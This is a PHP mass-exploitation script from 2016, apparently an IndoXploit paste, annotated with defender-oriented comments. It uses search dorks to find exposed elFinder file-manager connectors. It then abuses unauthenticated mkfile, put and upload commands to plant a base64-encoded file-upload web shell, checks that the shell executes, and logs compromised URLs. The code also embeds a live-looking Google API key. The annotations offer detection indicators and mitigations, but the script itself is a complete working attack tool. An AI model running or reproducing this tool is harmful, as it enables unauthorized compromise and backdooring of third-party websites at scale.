Tu5b0l3d

Auto exploiter Elfinder and Dorking

Mar 4th, 2016
  1. <?php
  2. # Tu5b0l3d - IndoXploit
  3. # thx: shor7cut, sohai
  4. # http://indoxploit.blogspot.co.id/2016/03/auto-dorking-exploit-elfinder.html
  5.  
// Analyst summary of this setup section: it defines the search query, a
// hard-coded API key, the payload file name and the payload body, then writes
// the payload to a local file in the current working directory.
error_reporting(0); // silences all PHP errors and warnings for the whole run
// start
$dorks = "/elFinder/files"; // the search-engine query ("dork"); can be changed
$no=1;
$b = 8;
$total_target =0;
$dork = urlencode($dorks);
// NOTE(review): a Google API key is embedded in a public paste. A key exposed
// this way should be treated as compromised and revoked by its owner.
$kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
$nama_doang = "k.php"; // just the file name given to the payload

// Base64-encoded PHP payload. Decoded, it is a small upload form that copies
// any POSTed file into its own directory under the client-supplied name, with
// no authentication: in effect a file-upload web shell.
// Defenders: this literal, and an unexpected "k.php" inside an elFinder
// "files" directory, are usable static indicators when sweeping web roots.
$isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";

$decode_isi = base64_decode($isi_nama_doang); // plaintext PHP source of the payload
$encode = base64_encode($nama_doang);         // base64 of the file name; appended to "l1_" in the "put" request below

// Writes the decoded payload to ./k.php on the machine running this script.
// NOTE(review): the handle is never closed, and if this script sits in a
// web-served directory the operator's own host now exposes the uploader too.
$fp = fopen($nama_doang,"w");
fputs($fp, $decode_isi);
//end
  24.  
  25.  
/**
 * Appends $data to the local result log "shell_elFinder.htm".
 *
 * The file is opened in append mode in the current working directory, and the
 * script terminates with "cant open file" if the open fails. In this script
 * the only caller passes the URL of an uploaded payload, so a recovered copy
 * of this log is a list of affected sites for incident responders.
 *
 * @param string $data Text to append (not escaped or validated here).
 */
function save($data){
        $fp = @fopen("shell_elFinder.htm", "a") or die("cant open file");
        fwrite($fp, $data);
        fclose($fp);
}
  31.  
/**
 * Sends an HTTP POST with cURL and returns the response body.
 *
 * Observable traits, useful for log analysis:
 *  - a fixed User-Agent string (Firefox 32 on Windows NT 6.1);
 *  - redirects are followed;
 *  - TLS peer and host verification are both disabled;
 *  - cookies are stored in and replayed from a local file named "coker_log".
 *
 * @param string       $url Request URL.
 * @param array|string $isi POST fields, passed straight to CURLOPT_POSTFIELDS.
 * @return string|false Response body as returned by curl_exec().
 */
function ngirim($url, $isi){
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// Certificate validation is switched off entirely for these requests.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);
// The cURL handle is not closed before returning.
return $data3;
}
  46.  
/**
 * Drives an exposed elFinder connector through a file-creation sequence and
 * reports whether the payload ended up reachable.
 *
 * Request sequence visible in the code:
 *  1. GET  <connector>?cmd=mkfile&name=<file>&target=l1_Lw
 *  2. POST <connector> with cmd=put, target=l1_<base64 name>, content=<payload>
 *  3. only if the name is absent from the response to (2):
 *     POST <connector>?cmd=upload with a multipart file field
 *
 * Defenders: a connector.php hit with cmd=mkfile followed by cmd=put or
 * cmd=upload and then a GET for a new .php under /files/ is the access-log
 * pattern this produces. It only works where the connector answers
 * unauthenticated requests and the upload directory executes PHP; requiring
 * authentication on the connector, removing unused elFinder installs, and
 * denying script execution in the files directory remove the exposure.
 *
 * @param string $target      Connector URL.
 * @param string $nama_doang  Payload file name.
 * @param string $url_mkfile  Overwritten on the first line; the passed-in value is unused.
 * @param string $encode      Base64 of the file name.
 * @param string $decode_isi  Payload source sent as the "content" field.
 * @param string $ini_site    Site base URL handed to cek_pepes().
 * @return string Status text from cek_pepes(), or "# Upload Failed 2\n".
 */
function elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site){
$url_mkfile = "$target?cmd=mkfile&name=$nama_doang&target=l1_Lw";
$b = file_get_contents("$url_mkfile"); // response is stored but never inspected

 // Fields for the "put" request that writes the payload into the created file.
 $post1 = array(
                    "cmd" => "put",
                    "target" => "l1_$encode",
                    "content" => "$decode_isi",
                   
                    );
 // Fields for the fallback multipart upload; "current" is a fixed hash value.
 $post2 = array(
                   
                    "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
                    "upload[]" => "@$nama_doang",
                   
                    );

$output_mkfile = ngirim("$target", $post1);
// The file name appearing in the connector's response is taken as success.
if(preg_match("/$nama_doang/", $output_mkfile)){
    $b = cek_pepes($ini_site, $nama_doang);
    return $b;
}
else{
$upload_ah = ngirim("$target?cmd=upload", $post2);
if(preg_match("/$nama_doang/", $upload_ah)){
    $b = cek_pepes($ini_site, $nama_doang);
    return $b;
}
else{
    $b = "# Upload Failed 2\n";
    return $b;
}
}
}
  81.  
/**
 * Fetches <site>/files/<name> and treats a body containing "file" as proof
 * that the payload is being served and executed.
 *
 * On a match the URL is appended to the local log through save(). The match
 * string "file" appears in the upload form the payload prints, so it is only
 * found when the server runs the PHP rather than refusing or blocking it.
 * Defenders: a GET for /files/k.php right after connector traffic is the
 * verification step, and a 200 response to it means the directory executes PHP.
 *
 * @param string $target     Site base URL (the part before "files").
 * @param string $nama_doang Payload file name.
 * @return string "# Uploaded ..." with the URL, or "# Gagal Upload" (upload failed).
 */
function cek_pepes($target, $nama_doang){
    $aso = "$target/files/$nama_doang";
    echo "# $aso\n";
    $cekk = file_get_contents("$aso");
    if(preg_match("/file/", $cekk)){
        $a = "# Uploaded \n# $aso";
        save("$aso<br>"); // record the reachable payload URL in shell_elFinder.htm
        return $a;
    }
    else{
        $a = "# Gagal Upload";
        return $a;
    }
}
  96.  
    // Main loop: pages through search results for the query and, for every
    // hit, probes two common elFinder connector paths on that site.
    // Defenders: the probe is an unauthenticated GET of
    // connectors/php/connector.php or php/connector.php. A connector that
    // answers such a request with JSON is what this loop looks for, so
    // requiring authentication there (or removing the install) stops it here.
    for($i=0;$i+=8;$i++){
        echo $i."\n";
// Query to the Google AJAX Search API using the hard-coded key, 8 results per page.
$result = file_get_contents("http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q=$dork&key=$kunAPI&start=$i");
$data = json_decode($result, true);

if($data['responseStatus']=="200"){
foreach ($data['responseData']['results'] as $key) {

$siten = $key['url'];
// Everything before the first "files" in the result URL is taken as the elFinder base URL.
$explode = explode("files", $siten);
    $ini_site = $explode[0];
    $ini = array("connectors/php/connector.php", "php/connector.php");
    foreach($ini as $path){
        $target = "$ini_site$path";
        echo "# $target\n";
        $cek = file_get_contents("$target");
        // $data is reused here, replacing the search response with the connector's JSON reply.
        $data = json_decode($cek, true);
        $error_ngk = $data['error']['0'];
        $error_cwd = $data['cwd']['name'];

        // No error in the reply: proceed only when the working directory is named "Home".
        if($error_ngk == ""){
            if($error_cwd == "Home"){
                $b = elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site);
                echo "$b\n\n";
            }
            else{
                echo "- Not Vuln!\n\n";
            }
        }
        // Any error reply from the connector is still followed by the upload attempt.
        else{
            $b = elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site);
            echo "$b\n\n";
        }
            }



    $total_target++;
     flush();
     sleep(1); // one-second pause between sites


}
}
// 403: the search API rejected the request as suspected terms-of-service abuse.
else if($data['responseStatus']=="403"){
echo "Suspected Terms of Service Abuse!!! {oww jancokk -_-}\n";
// 400: no more results ("Tidak ada hasil" = "no results"); the scan ends.
}else if($data['responseStatus']=="400"){
echo "Tidak ada hasil - Scan Done !!!\n";
break;
}
$no++;
}
  148. ?>